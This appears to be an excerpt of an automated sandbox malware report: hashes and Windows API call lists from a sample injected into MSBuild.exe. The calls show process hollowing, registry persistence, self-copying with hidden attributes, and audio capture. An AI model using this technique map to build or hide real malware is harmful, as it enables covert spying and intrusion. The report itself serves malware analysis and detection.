                                                                                                • Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                                • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                                                                • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                • GetLastError.KERNEL32 ref: 004175C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                • API String ID: 4188446516-3035715614
                                                                                                • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                • API String ID: 4250697656-2665858469
                                                                                                • Opcode ID: b78e1228bfcf1152717d4e06b96b9f654a8980d279fc97c9c1fd34a995d97097
                                                                                                • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                • Opcode Fuzzy Hash: b78e1228bfcf1152717d4e06b96b9f654a8980d279fc97c9c1fd34a995d97097
                                                                                                • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                • API String ID: 738084811-1408154895
                                                                                                • Opcode ID: c8874a4ef884f592fa1caa418ba264597b3d04ee3cf373917ff04b4681717e95
                                                                                                • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                • Opcode Fuzzy Hash: c8874a4ef884f592fa1caa418ba264597b3d04ee3cf373917ff04b4681717e95
                                                                                                • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                • API String ID: 1646373207-89630625
                                                                                                • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040BC75
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                • _wcslen.LIBCMT ref: 0040BD54
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                • _wcslen.LIBCMT ref: 0040BE34
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
                                                                                                • API String ID: 1579085052-1088133900
                                                                                                • Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                • Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                • GetLastError.KERNEL32 ref: 0041B313
                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                • GetLastError.KERNEL32 ref: 0041B370
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                • String ID: ?
                                                                                                • API String ID: 3941738427-1684325040
                                                                                                • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 3899193279-0
                                                                                                • Opcode ID: 4dff80f9f2e6418a47ef4f1e3ec22160d27dda194db1b92759e52112f0dcc884
                                                                                                • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                • Opcode Fuzzy Hash: 4dff80f9f2e6418a47ef4f1e3ec22160d27dda194db1b92759e52112f0dcc884
                                                                                                • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                • API String ID: 1223786279-3931108886
                                                                                                • Opcode ID: 57ee07ea57e2786759881091ef8f4255660d87c0fdec43e829bbe04dac016576
                                                                                                • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                • Opcode Fuzzy Hash: 57ee07ea57e2786759881091ef8f4255660d87c0fdec43e829bbe04dac016576
                                                                                                • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                • API String ID: 2490988753-744132762
                                                                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                • CreatePopupMenu.USER32 ref: 0041CB7A
